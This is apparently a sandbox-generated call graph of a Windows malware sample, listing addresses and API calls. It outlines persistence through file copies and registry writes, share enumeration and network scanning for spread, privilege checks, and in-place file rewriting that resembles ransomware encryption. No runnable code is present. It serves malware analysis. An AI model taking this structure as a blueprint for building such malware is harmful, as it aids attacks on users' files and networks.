4032 d1256 4031->4032 4033 d3bb3 9 API calls 4032->4033 4034 d1263 4033->4034 4035 d3bb3 9 API calls 4034->4035 4036 d126e 4035->4036 4037 d9041 2 API calls 4036->4037 4038 d127d 4037->4038 4039 d9041 2 API calls 4038->4039 4040 d1287 4039->4040 4041 d9041 2 API calls 4040->4041 4042 d1291 4041->4042 4043 d9041 2 API calls 4042->4043 4044 d129b 4043->4044 4045 d9041 2 API calls 4044->4045 4046 d12a4 4045->4046 4047 d9041 2 API calls 4046->4047 4048 d12ae 4047->4048 4049 d1506 4048->4049 4562 d5b0e GetModuleFileNameW 4048->4562 4050 d39da 2 API calls 4049->4050 4051 d150f 4050->4051 4053 d39da 2 API calls 4051->4053 4054 d1518 4053->4054 4055 d39da 2 API calls 4054->4055 4056 d1521 4055->4056 4058 d39da 2 API calls 4056->4058 4057 d12ce 4057->4049 4059 d5b20 5 API calls 4057->4059 4060 d152a 4058->4060 4066 d12f1 4059->4066 4061 d39da 2 API calls 4060->4061 4062 d1531 4061->4062 4063 d39da 2 API calls 4062->4063 4064 d153a 4063->4064 4065 d39da 2 API calls 4064->4065 4068 d1543 4065->4068 4066->4049 4563 d5b7c 4066->4563 4069 d39da 2 API calls 4068->4069 4071 d154c 4069->4071 4072 d39da 2 API calls 4071->4072 4073 d1555 4072->4073 4075 d39da 2 API calls 4073->4075 4074 d5b7c 5 API calls 4076 d1353 4074->4076 4077 d155e 4075->4077 4076->4049 4078 d1378 CopyFileW 4076->4078 4077->3719 4079 d138c 4078->4079 4080 d1461 4078->4080 4081 d1392 RegOpenKeyExW 4079->4081 4080->4049 4082 d35d2 4 API calls 4080->4082 4083 d13c2 4081->4083 4084 d13b3 4081->4084 4094 d1477 4082->4094 4086 d13d8 RegOpenKeyExW 4083->4086 4570 d3a93 RegSetValueExW RegCloseKey 4084->4570 4087 d13f9 4086->4087 4091 d1408 4086->4091 4571 d3a93 RegSetValueExW RegCloseKey 4087->4571 4089 d14fe 4572 d90a1 GetProcessHeap HeapFree 4089->4572 4091->4080 4093 d143e CopyFileW GetFileAttributesW 4091->4093 4092 d14a2 CopyFileW 4092->4094 4093->4080 4095 d1456 SetFileAttributesW 4093->4095 4094->4049 4094->4089 4094->4092 4096 d14c5 CopyFileW GetFileAttributesW 4094->4096 4095->4080 4096->4094 4097 d14dd SetFileAttributesW 4096->4097 4097->4094 4099 d3bb3 9 API calls 4098->4099 4100 d3c8d 4099->4100 4101 d3c9e GetVolumeInformationW 4100->4101 4102 d3cac 4101->4102 4103 d39da 2 API calls 4102->4103 4104 d2cbc 4103->4104 4105 d1894 4104->4105 4106 d9041 2 API calls 4105->4106 4107 d18a4 4106->4107 4108 d6347 2 API calls 4107->4108 4109 d18b3 4108->4109 4110 d6347 2 API calls 4109->4110 4111 d18be 4110->4111 4112 d6347 2 API calls 4111->4112 4113 d18c9 4112->4113 4114 d6347 2 API calls 4113->4114 4125 d18da 4114->4125 4115 d39b7 2 API calls 4116 d1a28 4115->4116 4118 d39da 2 API calls 4116->4118 4117 d19e5 4120 d1870 2 API calls 4117->4120 4143 d19ef 4117->4143 4119 d1a30 4118->4119 4121 d39da 2 API calls 4119->4121 4120->4143 4122 d1a3b 4121->4122 4123 d39da 2 API calls 4122->4123 4124 d1a44 4123->4124 4126 d1a52 4124->4126 4614 d90a1 GetProcessHeap HeapFree 4124->4614 4125->4117 4127 d5fe7 6 API calls 4125->4127 4125->4143 4130 d1a60 4126->4130 4615 d90a1 GetProcessHeap HeapFree 4126->4615 4129 d1947 4127->4129 4129->4117 4133 d35d2 4 API calls 4129->4133 4132 d1a6e 4130->4132 4616 d90a1 GetProcessHeap HeapFree 4130->4616 4132->3759 4135 d1960 4133->4135 4135->4117 4136 d35d2 4 API calls 4135->4136 4137 d1975 4136->4137 4137->4117 4138 d1991 4137->4138 4139 d35d2 4 API calls 4137->4139 4138->4117 4140 d35d2 4 API calls 4138->4140 4141 d19a6 4138->4141 4139->4138 4140->4141 4141->4117 4575 d15a6 4141->4575 4143->4115 4145 d9041 2 API calls 4144->4145 4146 d24cc 4145->4146 4147 d2500 4146->4147 4148 d24d3 CreateThread 4146->4148 4147->3767 4148->3767 4149->3782 4151 d3c7a 10 API calls 4150->4151 4152 d1013 GetLogicalDrives 4151->4152 4153 d3bb3 9 API calls 4152->4153 4154 d1024 4153->4154 4155 d6347 2 API calls 4154->4155 4156 d1030 4155->4156 4157 d6347 2 API calls 4156->4157 4158 d103b 4157->4158 4159 d6347 2 API calls 4158->4159 4160 d1046 4159->4160 4161 d6347 2 API calls 4160->4161 4162 d1054 4161->4162 4163 d9041 2 API calls 4162->4163 4164 d1061 4163->4164 4642 d3c29 4164->4642 4167 d3c29 6 API calls 4168 d108e 4167->4168 4170 d35d2 4 API calls 4168->4170 4176 d10af 4168->4176 4184 d11d0 4168->4184 4169 d39da 2 API calls 4171 d11db 4169->4171 4170->4176 4172 d39da 2 API calls 4171->4172 4173 d11e4 4172->4173 4174 d39da 2 API calls 4173->4174 4175 d11ed 4174->4175 4177 d39da 2 API calls 4175->4177 4178 d35d2 4 API calls 4176->4178 4187 d10ef 4176->4187 4179 d11f6 4177->4179 4178->4176 4180 d39da 2 API calls 4179->4180 4181 d11fd 4180->4181 4182 d39f9 2 API calls 4181->4182 4183 d1206 4182->4183 4185 d39f9 2 API calls 4183->4185 4184->4169 4186 d120f 4185->4186 4188 d121e 4186->4188 4649 d90a1 GetProcessHeap HeapFree 4186->4649 4187->4184 4191 d3969 CreateFileW WriteFile CloseHandle 4187->4191 4193 d3e9e ShellExecuteExW 4187->4193 4190 d122d 4188->4190 4650 d90a1 GetProcessHeap HeapFree 4188->4650 4190->3790 4191->4187 4193->4187 4651 d90a1 GetProcessHeap HeapFree 4194->4651 4196 d5996 4196->3670 4197->3678 4199 d2f59 4198->4199 4200 d39c0 4198->4200 4199->3695 4202 d1870 4199->4202 4652 d90a1 GetProcessHeap HeapFree 4200->4652 4203 d187d 4202->4203 4204 d1877 4202->4204 4206 d188b 4203->4206 4207 d1567 2 API calls 4203->4207 4653 d90a1 GetProcessHeap HeapFree 4204->4653 4654 d90a1 GetProcessHeap HeapFree 4206->4654 4207->4206 4209 d1891 4209->3695 4211 d627a 4210->4211 4212 d6280 4210->4212 4655 d90a1 GetProcessHeap HeapFree 4211->4655 4215 d628e 4212->4215 4656 d90a1 GetProcessHeap HeapFree 4212->4656 4657 d90a1 GetProcessHeap HeapFree 4215->4657 4217 d62a2 4217->3657 4219 d9049 4218->4219 4220 d904a GetProcessHeap HeapAlloc 4218->4220 4219->4220 4220->3797 4221->3810 4222->3815 4223->3814 4224->3813 4225->3818 4227 d9041 2 API calls 4226->4227 4228 d5b2e 4227->4228 4229 d5b35 4228->4229 4230 d5b77 4228->4230 4251 d5b0e GetModuleFileNameW 4229->4251 4230->3830 4232 d5b3b 4252 d90a1 GetProcessHeap HeapFree 4232->4252 4234 d5b76 4234->4230 4236 d2519 4235->4236 4253 d92e1 4236->4253 4238 d2523 4239 d9041 2 API calls 4238->4239 4240 d2532 4239->4240 4241 d25cb 4240->4241 4258 d25f3 4240->4258 4243 d25d5 4241->4243 4267 d90a1 GetProcessHeap HeapFree 4241->4267 4245 d25e7 4243->4245 4268 d90a1 GetProcessHeap HeapFree 4243->4268 4245->3842 4247->3828 4248->3829 4249->3832 4250->3834 4251->4232 4252->4234 4254 d930b 4253->4254 4255 d92ea 4253->4255 4254->4238 4269 d905b 4255->4269 4257 d92f9 4257->4238 4257->4254 4262 d2607 4258->4262 4266 d2600 4258->4266 4259 d2685 4260 d92e1 2 API calls 4259->4260 4259->4266 4264 d2690 4260->4264 4261 d261d 4261->4266 4272 d35d2 4261->4272 4262->4259 4262->4261 4262->4266 4265 d9041 2 API calls 4264->4265 4265->4266 4266->4240 4267->4243 4268->4245 4270 d9069 GetProcessHeap HeapAlloc 4269->4270 4271 d9068 4269->4271 4270->4257 4271->4270 4273 d35e9 4272->4273 4278 d3612 4272->4278 4274 d3617 4273->4274 4275 d35f6 4273->4275 4273->4278 4276 d9041 2 API calls 4274->4276 4279 d907a 4275->4279 4276->4278 4278->4266 4280 d9089 GetProcessHeap HeapReAlloc 4279->4280 4281 d9081 4279->4281 4280->4278 4281->4280 4282->3872 4283->3873 4284->3871 4286 d92e1 2 API calls 4285->4286 4291 d5ff4 4286->4291 4287 d291c 4287->3892 4292 d3940 4287->4292 4288 d907a 2 API calls 4288->4291 4289 d6055 4295 d90a1 GetProcessHeap HeapFree 4289->4295 4291->4287 4291->4288 4291->4289 4296 d38da 4292->4296 4295->4287 4297 d38ea 4296->4297 4298 d38f0 EnterCriticalSection 4296->4298 4297->4298 4299 d3939 4297->4299 4300 d38fd 4298->4300 4307 d3915 4298->4307 4299->3892 4311 d2fb5 4300->4311 4301 d3927 4304 d3848 7 API calls 4301->4304 4303 d3848 7 API calls 4303->4307 4308 d3931 LeaveCriticalSection 4304->4308 4305 d3905 4314 d3848 4305->4314 4307->4301 4307->4303 4308->4299 4310 d39da 2 API calls 4310->4307 4312 d6347 2 API calls 4311->4312 4313 d2fc3 4312->4313 4313->4305 4316 d385d 4314->4316 4315 d3887 4317 d38d2 4315->4317 4318 d9041 2 API calls 4315->4318 4316->4315 4319 d3876 WriteConsoleW 4316->4319 4317->4310 4320 d3897 4318->4320 4319->4315 4320->4317 4321 d389e WideCharToMultiByte WriteFile 4320->4321 4323 d90a1 GetProcessHeap HeapFree 4321->4323 4323->4317 4324->3897 4326 d6347 2 API calls 4325->4326 4327 d3d5f 4326->4327 4328 d3d8b GetModuleHandleA 4327->4328 4329 d3d96 GetProcAddress 4328->4329 4330 d3dab 4328->4330 4329->4330 4331 d39b7 2 API calls 4330->4331 4333 d3db9 GetModuleHandleA GetProcAddress 4331->4333 4333->3938 4333->3955 4334->3945 4335->3942 4348 d930f 4336->4348 4338 d4d7a 4339 d4d7f CreateThread 4338->4339 4340 d4db7 4338->4340 4339->4340 4341 d4d96 WaitForSingleObject 4339->4341 4353 d4b85 4339->4353 4344 d39f9 4340->4344 4342 d4db0 CloseHandle 4341->4342 4343 d4da2 GetExitCodeThread 4341->4343 4342->4340 4343->4342 4345 d3a13 4344->4345 4346 d3a02 4344->4346 4345->3959 4347 d39b7 2 API calls 4346->4347 4347->4345 4349 d931c 4348->4349 4350 d9318 4348->4350 4351 d9041 2 API calls 4349->4351 4350->4338 4352 d932a 4351->4352 4352->4338 4382 d3bb3 4353->4382 4355 d4ba5 4356 d3d4b 6 API calls 4355->4356 4357 d4c05 CreatePipe 4356->4357 4358 d4cf1 4357->4358 4359 d4c27 CreatePipe 4357->4359 4361 d4d09 4358->4361 4362 d4d03 CloseHandle 4358->4362 4359->4358 4360 d4c41 SetHandleInformation 4359->4360 4360->4358 4363 d4c57 SetHandleInformation 4360->4363 4364 d4d0f CloseHandle 4361->4364 4365 d4d15 4361->4365 4362->4361 4363->4358 4366 d4c67 CreateProcessW 4363->4366 4364->4365 4367 d4d1e CloseHandle 4365->4367 4368 d4d24 4365->4368 4366->4358 4371 d4cbd 4366->4371 4367->4368 4369 d4d2a CloseHandle 4368->4369 4370 d4d30 4368->4370 4369->4370 4372 d4d3c 4370->4372 4373 d4d36 CloseHandle 4370->4373 4376 d4ccb WriteFile WaitForSingleObject 4371->4376 4374 d4d48 4372->4374 4375 d4d42 CloseHandle 4372->4375 4373->4372 4377 d39da 2 API calls 4374->4377 4375->4374 4378 d3d4b 6 API calls 4376->4378 4379 d4d51 4377->4379 4378->4358 4380 d39f9 2 API calls 4379->4380 4381 d4d5a 4380->4381 4383 d2fb5 2 API calls 4382->4383 4384 d3bc3 4383->4384 4385 d92e1 2 API calls 4384->4385 4389 d3bcd 4385->4389 4386 d3c0e 4387 d39da 2 API calls 4386->4387 4388 d3c21 4387->4388 4388->4355 4389->4386 4396 d3b33 4389->4396 4391 d907a 2 API calls 4392 d3be3 4391->4392 4392->4386 4392->4391 4393 d3c10 4392->4393 4395 d3b33 5 API calls 4392->4395 4407 d90a1 GetProcessHeap HeapFree 4393->4407 4395->4392 4397 d9041 2 API calls 4396->4397 4398 d3b47 4397->4398 4399 d6347 2 API calls 4398->4399 4400 d3b54 4399->4400 4401 d39da 2 API calls 4400->4401 4402 d3b70 4401->4402 4403 d3b79 ExpandEnvironmentStringsW 4402->4403 4406 d3b8d 4402->4406 4403->4406 4405 d3bab 4405->4392 4408 d90a1 GetProcessHeap HeapFree 4406->4408 4407->4386 4408->4405 4410 d6347 2 API calls 4409->4410 4411 d4566 4410->4411 4412 d3c7a 10 API calls 4411->4412 4413 d4588 4412->4413 4414 d6347 2 API calls 4413->4414 4415 d4598 4414->4415 4474 d3a18 RegOpenKeyExW 4415->4474 4417 d45c8 4418 d39b7 2 API calls 4417->4418 4419 d45ed 4418->4419 4420 d3bb3 9 API calls 4419->4420 4421 d45fc 4420->4421 4422 d6347 2 API calls 4421->4422 4423 d460b 4422->4423 4424 d6347 2 API calls 4423->4424 4425 d4617 4424->4425 4426 d3bb3 9 API calls 4425->4426 4427 d4622 4426->4427 4428 d9041 2 API calls 4427->4428 4429 d4633 GetVersion GetModuleHandleA GetProcAddress 4428->4429 4430 d466d 4429->4430 4431 d3d4b 6 API calls 4430->4431 4433 d4678 4431->4433 4432 d482a 4434 d3d4b 6 API calls 4432->4434 4433->4432 4479 d4428 GetCurrentProcess OpenProcessToken 4433->4479 4436 d4835 4434->4436 4437 d39da 2 API calls 4436->4437 4438 d483e 4437->4438 4439 d39b7 2 API calls 4438->4439 4440 d484e 4439->4440 4443 d39da 2 API calls 4440->4443 4441 d468a 4441->4432 4493 d5b0e GetModuleFileNameW 4441->4493 4444 d486d 4443->4444 4445 d39b7 2 API calls 4444->4445 4447 d487b 4445->4447 4446 d46a9 4446->4432 4448 d46ea 4446->4448 4449 d46dc GetCurrentProcess 4446->4449 4450 d39da 2 API calls 4447->4450 4453 d6347 2 API calls 4448->4453 4449->4448 4451 d4884 4450->4451 4452 d39da 2 API calls 4451->4452 4454 d4890 4452->4454 4455 d4716 4453->4455 4455->4432 4456 d4724 CreateFileW 4455->4456 4456->4432 4457 d474a WriteFile 4456->4457 4457->4432 4458 d4769 4457->4458 4458->4432 4459 d4777 WriteFile 4458->4459 4459->4432 4460 d4795 4459->4460 4460->4432 4461 d479f FlushFileBuffers CloseHandle 4460->4461 4494 d3ee1 4461->4494 4467 d47eb 4468 d47f5 WaitForSingleObject 4467->4468 4469 d4800 4467->4469 4468->4469 4470 d4325 14 API calls 4469->4470 4471 d4810 4470->4471 4472 d3ee1 20 API calls 4471->4472 4473 d4819 DeleteFileW 4472->4473 4473->4432 4475 d3a7f 4474->4475 4476 d3a4e RegQueryValueExW 4474->4476 4475->4417 4477 d3a6a RegCloseKey 4476->4477 4477->4475 4480 d44e4 4479->4480 4481 d4464 GetTokenInformation 4479->4481 4482 d4539 4480->4482 4483 d4530 FreeSid 4480->4483 4484 d9041 2 API calls 4481->4484 4488 d4543 4482->4488 4525 d90a1 GetProcessHeap HeapFree 4482->4525 4483->4482 4485 d4482 GetTokenInformation 4484->4485 4485->4480 4486 d449c AllocateAndInitializeSid 4485->4486 4486->4480 4490 d44bd 4486->4490 4488->4441 4489 d44c9 EqualSid 4489->4490 4491 d44e6 LookupAccountSidW 4489->4491 4490->4480 4490->4489 4491->4480 4492 d4516 GetLastError 4491->4492 4492->4480 4493->4446 4495 d6347 2 API calls 4494->4495 4496 d3efc 4495->4496 4497 d3f7a 8 API calls 4496->4497 4498 d4101 CloseHandle 4497->4498 4499 d3fc3 4497->4499 4500 d39b7 2 API calls 4498->4500 4499->4498 4502 d3fe6 GetCurrentProcessId OpenProcess 4499->4502 4501 d4113 4500->4501 4501->4432 4512 d4325 4501->4512 4502->4498 4503 d4007 4502->4503 4503->4498 4504 d401b ReadProcessMemory 4503->4504 4504->4498 4505 d4036 ReadProcessMemory 4504->4505 4505->4498 4506 d4050 GetModuleFileNameW 4505->4506 4508 d408c ReadProcessMemory 4506->4508 4509 d40a0 ReadProcessMemory 4508->4509 4510 d40db 4508->4510 4509->4510 4511 d40bc 4509->4511 4510->4498 4511->4508 4511->4510 4513 d3bb3 9 API calls 4512->4513 4514 d4335 4513->4514 4515 d435d CoInitializeEx 4514->4515 4516 d4389 4515->4516 4517 d43bb 4515->4517 4526 d5d61 4516->4526 4518 d39b7 2 API calls 4517->4518 4519 d43c2 4518->4519 4519->4432 4522 d3e9e 4519->4522 4539 d8fa9 4522->4539 4525->4488 4527 d43b2 CoUninitialize 4526->4527 4528 d5d7b 4526->4528 4527->4517 4528->4527 4529 d9041 2 API calls 4528->4529 4530 d5d9c 4529->4530 4530->4527 4531 d5dbb FindFirstFileW 4530->4531 4532 d5eb3 4531->4532 4537 d5dd8 4531->4537 4538 d90a1 GetProcessHeap HeapFree 4532->4538 4534 d5e92 FindNextFileW 4535 d5eaa FindClose 4534->4535 4534->4537 4535->4532 4536 d5d61 4 API calls 4536->4537 4537->4534 4537->4535 4537->4536 4538->4527 4540 d3eb1 ShellExecuteExW 4539->4540 4540->4467 4541->3991 4542->3979 4543->4001 4544->4006 4546 d930f 2 API calls 4545->4546 4549 d6219 4546->4549 4547 d6263 4547->4023 4548 d907a 2 API calls 4548->4549 4549->4547 4549->4548 4550 d6265 4549->4550 4561 d90a1 GetProcessHeap HeapFree 4550->4561 4553 d3d45 4552->4553 4554 d3ce0 WinHttpConnect 4552->4554 4553->4015 4555 d3d3f WinHttpCloseHandle 4554->4555 4556 d3cfa WinHttpOpenRequest 4554->4556 4555->4553 4557 d3d39 WinHttpCloseHandle 4556->4557 4558 d3d14 WinHttpSendRequest 4556->4558 4557->4555 4559 d3d2b WinHttpReceiveResponse 4558->4559 4560 d3d36 WinHttpCloseHandle 4558->4560 4559->4560 4560->4557 4561->4547 4562->4057 4564 d9041 2 API calls 4563->4564 4565 d5b8a 4564->4565 4566 d1335 4565->4566 4573 d5b0e GetModuleFileNameW 4565->4573 4566->4049 4566->4074 4569 d5b97 4574 d90a1 GetProcessHeap HeapFree 4569->4574 4570->4083 4571->4091 4572->4049 4573->4569 4574->4566 4576 d9041 2 API calls 4575->4576 4577 d15b6 4576->4577 4578 d9041 2 API calls 4577->4578 4579 d15c4 4578->4579 4580 d6347 2 API calls 4579->4580 4581 d15d1 4580->4581 4582 d3bb3 9 API calls 4581->4582 4583 d15db 4582->4583 4584 d3bb3 9 API calls 4583->4584 4585 d15e8 4584->4585 4586 d16d7 4585->4586 4589 d5b7c 5 API calls 4585->4589 4613 d16c8 4585->4613 4588 d16e3 4586->4588 4636 d90a1 GetProcessHeap HeapFree 4586->4636 4592 d39da 2 API calls 4588->4592 4590 d1610 4589->4590 4594 d1627 4590->4594 4617 d3698 4590->4617 4593 d16ec 4592->4593 4595 d39da 2 API calls 4593->4595 4597 d1641 4594->4597 4599 d35d2 4 API calls 4594->4599 4594->4613 4598 d16f5 4595->4598 4600 d165b 4597->4600 4603 d3698 4 API calls 4597->4603 4597->4613 4601 d39da 2 API calls 4598->4601 4599->4597 4604 d1671 4600->4604 4605 d35d2 4 API calls 4600->4605 4600->4613 4602 d16fe 4601->4602 4602->4117 4603->4600 4606 d1687 4604->4606 4607 d3698 4 API calls 4604->4607 4604->4613 4605->4604 4608 d169d 4606->4608 4609 d35d2 4 API calls 4606->4609 4606->4613 4607->4606 4610 d35d2 4 API calls 4608->4610 4611 d16b2 4608->4611 4608->4613 4609->4608 4610->4611 4611->4586 4612 d3698 4 API calls 4611->4612 4611->4613 4612->4613 4613->4586 4624 d1567 4613->4624 4614->4126 4615->4130 4616->4132 4618 d36d3 4617->4618 4619 d36ab 4617->4619 4618->4594 4619->4618 4620 d36d6 4619->4620 4622 d36bc 4619->4622 4621 d9041 2 API calls 4620->4621 4621->4618 4623 d907a 2 API calls 4622->4623 4623->4618 4625 d156d 4624->4625 4626 d1573 4624->4626 4637 d90a1 GetProcessHeap HeapFree 4625->4637 4627 d1581 4626->4627 4638 d90a1 GetProcessHeap HeapFree 4626->4638 4630 d158f 4627->4630 4639 d90a1 GetProcessHeap HeapFree 4627->4639 4634 d159d 4630->4634 4640 d90a1 GetProcessHeap HeapFree 4630->4640 4641 d90a1 GetProcessHeap HeapFree 4634->4641 4635 d15a4 4635->4586 4636->4588 4637->4626 4638->4627 4639->4630 4640->4634 4641->4635 4643 d6347 2 API calls 4642->4643 4644 d3c3c 4643->4644 4645 d620d 6 API calls 4644->4645 4646 d3c69 4645->4646 4647 d39f9 2 API calls 4646->4647 4648 d1083 4647->4648 4648->4167 4649->4188 4650->4190 4651->4196 4652->4199 4653->4203 4654->4209 4655->4212 4656->4215 4657->4217 4659 d3e39 5 API calls 4658->4659 4660 d23a6 4659->4660 4670 d3955 4660->4670 4662 d5962 EnterCriticalSection LeaveCriticalSection 4664 d23b7 4662->4664 4663 d4f7a 16 API calls 4663->4664 4664->4662 4664->4663 4665 d2418 4664->4665 4666 d240b Sleep 4664->4666 4669 d23f4 EnterCriticalSection LeaveCriticalSection 4664->4669 4667 d3955 9 API calls 4665->4667 4666->4664 4668 d2423 4667->4668 4669->4666 4671 d38da 9 API calls 4670->4671 4672 d3966 4671->4672 4672->4664 4809 d2161 4810 d9041 2 API calls 4809->4810 4811 d2186 4810->4811 4812 d530c 10 API calls 4811->4812 4813 d2195 4812->4813 4814 d3955 9 API calls 4813->4814 4815 d21a6 4814->4815 4816 d22b5 4815->4816 4823 d21c6 GetComputerNameW 4815->4823 4839 d22ad 4815->4839 4817 d22c3 4816->4817 4855 d90a1 GetProcessHeap HeapFree 4816->4855 4818 d22ce 4817->4818 4856 d90a1 GetProcessHeap HeapFree 4817->4856 4822 d3955 9 API calls 4818->4822 4819 d52de 5 API calls 4819->4816 4824 d22db 4822->4824 4825 d21df 4823->4825 4826 d21ea 4823->4826 4857 d90a1 GetProcessHeap HeapFree 4824->4857 4829 d35d2 4 API calls 4825->4829 4840 d5962 EnterCriticalSection LeaveCriticalSection 4826->4840 4829->4826 4830 d22e4 4831 d1e10 71 API calls 4835 d21f3 4831->4835 4832 d3955 9 API calls 4832->4835 4834 d542b WaitForSingleObject 4834->4835 4835->4831 4835->4832 4835->4834 4836 d2292 Sleep 4835->4836 4835->4839 4841 d5230 4835->4841 4853 d90a1 GetProcessHeap HeapFree 4835->4853 4854 d5962 EnterCriticalSection LeaveCriticalSection 4836->4854 4839->4819 4840->4835 4842 d9041 2 API calls 4841->4842 4843 d524b 4842->4843 4844 d5258 GetIpAddrTable 4843->4844 4845 d52d6 4843->4845 4846 d52d0 4844->4846 4851 d5269 4844->4851 4845->4835 4879 d90a1 GetProcessHeap HeapFree 4846->4879 4848 d527a htonl 4849 d5285 htonl htonl 4848->4849 4848->4851 4858 d5067 htons 4849->4858 4851->4846 4851->4848 4852 d5067 88 API calls 4851->4852 4852->4851 4853->4835 4854->4835 4855->4817 4856->4818 4857->4830 4859 d905b 2 API calls 4858->4859 4860 d50aa 4859->4860 4861 d905b 2 API calls 4860->4861 4875 d50b5 4861->4875 4862 d5219 4893 d90a1 GetProcessHeap HeapFree 4862->4893 4864 d5221 4894 d90a1 GetProcessHeap HeapFree 4864->4894 4865 d50d2 htonl socket 4867 d50f8 ioctlsocket 4865->4867 4865->4875 4869 d510c connect 4867->4869 4867->4875 4868 d522a 4868->4851 4871 d511d WSAGetLastError 4869->4871 4869->4875 4871->4875 4872 d51e1 closesocket 4872->4875 4873 d5161 getsockopt 4873->4872 4873->4875 4874 d518b recv 4874->4875 4876 d51a2 WSAGetLastError 4874->4876 4875->4862 4875->4865 4875->4872 4875->4873 4875->4874 4877 d51b8 getpeername 4875->4877 4880 d4fa9 GetTickCount GetTickCount 4875->4880 4884 d2084 4875->4884 4876->4875 4877->4875 4879->4845 4881 d4fd8 4880->4881 4882 d505f 4881->4882 4883 d5029 select GetTickCount 4881->4883 4882->4875 4883->4881 4895 d8fd7 4884->4895 4887 d2106 WNetUseConnectionW 4888 d2130 4887->4888 4892 d2148 4887->4892 4897 d1e10 4888->4897 4891 d2155 4891->4875 4921 d5962 EnterCriticalSection LeaveCriticalSection 4892->4921 4893->4864 4894->4868 4896 d20e0 WSAAddressToStringW 4895->4896 4896->4887 4896->4892 4898 d9041 2 API calls 4897->4898 4899 d1e36 4898->4899 4900 d9041 2 API calls 4899->4900 4901 d1e44 4900->4901 4902 d206a 4901->4902 4904 d1e59 WNetOpenEnumW 4901->4904 4905 d2064 4901->4905 4903 d207a 4902->4903 4924 d90a1 GetProcessHeap HeapFree 4902->4924 4903->4892 4906 d2054 4904->4906 4907 d1e74 WNetEnumResourceW 4904->4907 4923 d90a1 GetProcessHeap HeapFree 4905->4923 4906->4905 4910 d205a WNetCloseEnum 4906->4910 4907->4906 4917 d1e91 4907->4917 4910->4905 4912 d202a WNetEnumResourceW 4912->4906 4912->4917 4913 d1e10 65 API calls 4913->4917 4914 d35d2 4 API calls 4914->4917 4915 d1fe2 CloseHandle 4915->4917 4916 d3c7a 10 API calls 4916->4917 4917->4906 4917->4912 4917->4913 4917->4914 4917->4915 4917->4916 4918 d1706 22 API calls 4917->4918 4919 d5840 49 API calls 4917->4919 4920 d2017 CloseHandle 4917->4920 4922 d5962 EnterCriticalSection LeaveCriticalSection 4917->4922 4918->4917 4919->4917 4920->4917 4921->4891 4922->4917 4923->4902 4924->4903 4925 d4281 4926 d428e 4925->4926 4928 d42aa 4925->4928 4926->4928 4929 d411d 4926->4929 4930 d6347 2 API calls 4929->4930 4931 d4136 4930->4931 4932 d413e GetModuleHandleA GetProcAddress 4931->4932 4933 d6347 2 API calls 4932->4933 4934 d415f 4933->4934 4935 d4183 CoGetObject 4934->4935 4940 d41af 4934->4940 4935->4940 4936 d39da 2 API calls 4937 d426d 4936->4937 4938 d39b7 2 API calls 4937->4938 4939 d4277 4938->4939 4939->4928 4940->4936 4941 d42bd 4942 d42cf 4941->4942 4944 d4313 4941->4944 4943 d411d 7 API calls 4942->4943 4942->4944 4943->4944 4945 d1bbf 4946 d530c 10 API calls 4945->4946 4947 d1bd5 4946->4947 4948 d3c7a 10 API calls 4947->4948 4949 d1bdc 4948->4949 4950 d9041 2 API calls 4949->4950 4951 d1bea 4950->4951 4952 d3955 9 API calls 4951->4952 4967 d1bfc 4952->4967 4953 d1c99 4954 d1ca3 4953->4954 4969 d90a1 GetProcessHeap HeapFree 4953->4969 4958 d3955 9 API calls 4954->4958 4955 d1c94 4956 d52de 5 API calls 4955->4956 4956->4953 4959 d1cb0 4958->4959 4970 d90a1 GetProcessHeap HeapFree 4959->4970 4961 d1c8d 4963 d542b WaitForSingleObject 4961->4963 4962 d1cb9 4963->4955 4964 d1706 22 API calls 4964->4967 4965 d5840 49 API calls 4965->4967 4966 d1c44 CloseHandle 4966->4967 4967->4953 4967->4955 4967->4961 4967->4964 4967->4965 4967->4966 4968 d1c73 CloseHandle 4967->4968 4968->4967 4969->4954 4970->4962 4971 d8ebe CreateFileW 4972 d8ee9 GetFileSizeEx 4971->4972 4973 d8fa2 4971->4973 4974 d8efc CloseHandle 4972->4974 4975 d8f96 4972->4975 4974->4973 4976 d8f1a GetFileAttributesW 4974->4976 4975->4973 4977 d8f9b CloseHandle 4975->4977 4976->4973 4978 d8f28 4976->4978 4977->4973 4979 d8f3e 4978->4979 4980 d8f37 SetFileAttributesW 4978->4980 4981 d8f67 4979->4981 4983 d8f53 4979->4983 4980->4979 5006 d8782 4981->5006 4988 d8c42 4983->4988 4984 d8f65 4984->4973 4986 d8f8c SetFileAttributesW 4984->4986 4987 d8f93 SetFileAttributesW 4984->4987 4986->4973 4987->4975 4989 d8c5c 4988->4989 4990 d8ccd MoveFileW 4989->4990 4991 d8eaa MoveFileW 4989->4991 4990->4991 4992 d8ce1 CreateFileW 4990->4992 4993 d8eb6 4991->4993 4992->4991 4994 d8d03 4992->4994 4993->4984 5030 d8b60 SetFilePointerEx 4994->5030 4996 d8e9b CloseHandle 4996->4991 4996->4993 4997 d8d12 4997->4996 4998 d8e15 SetFilePointerEx 4997->4998 4998->4996 4999 d8e49 WriteFile 4998->4999 4999->4996 5000 d8e63 4999->5000 5000->4996 5001 d8e6e SetEndOfFile 5000->5001 5035 d8af1 5001->5035 5004 d8e8d FlushFileBuffers 5005 d8e94 5004->5005 5005->4996 5007 d87a9 5006->5007 5008 d87e9 GetFileAttributesW 5007->5008 5009 d8ae9 5008->5009 5010 d8813 GetFileAttributesW 5008->5010 5009->4984 5010->5009 5011 d8825 CreateFileW 5010->5011 5011->5009 5012 d8847 SetFilePointerEx 5011->5012 5013 d8ab9 CloseHandle 5012->5013 5014 d886a 5012->5014 5016 d8acf 5013->5016 5017 d8aca CloseHandle 5013->5017 5014->5013 5015 d8876 SetFilePointerEx 5014->5015 5015->5013 5018 d889a CreateFileW 5015->5018 5016->5009 5019 d8ae3 DeleteFileW 5016->5019 5017->5016 5018->5013 5021 d88bf 5018->5021 5019->5009 5020 d8957 ReadFile 5020->5021 5022 d8974 5020->5022 5021->5013 5021->5020 5021->5022 5023 d8929 WriteFile 5021->5023 5024 d8979 5021->5024 5022->5013 5023->5021 5023->5022 5024->5022 5025 d8a4d WriteFile 5024->5025 5025->5022 5026 d8a6c 5025->5026 5026->5022 5027 d8a85 5026->5027 5040 d86b7 5026->5040 5027->5022 5029 d8a8c FlushFileBuffers FlushFileBuffers 5027->5029 5029->5022 5031 d8c31 5030->5031 5033 d8b8a __aulldiv 5030->5033 5031->4997 5032 d8bce SetFilePointerEx 5032->5031 5032->5033 5033->5031 5033->5032 5034 d8bfd ReadFile 5033->5034 5034->5031 5034->5033 5036 d8b0c 5035->5036 5037 d8b0f SetFilePointerEx 5036->5037 5038 d8b52 5036->5038 5037->5038 5039 d8b32 WriteFile 5037->5039 5038->5004 5038->5005 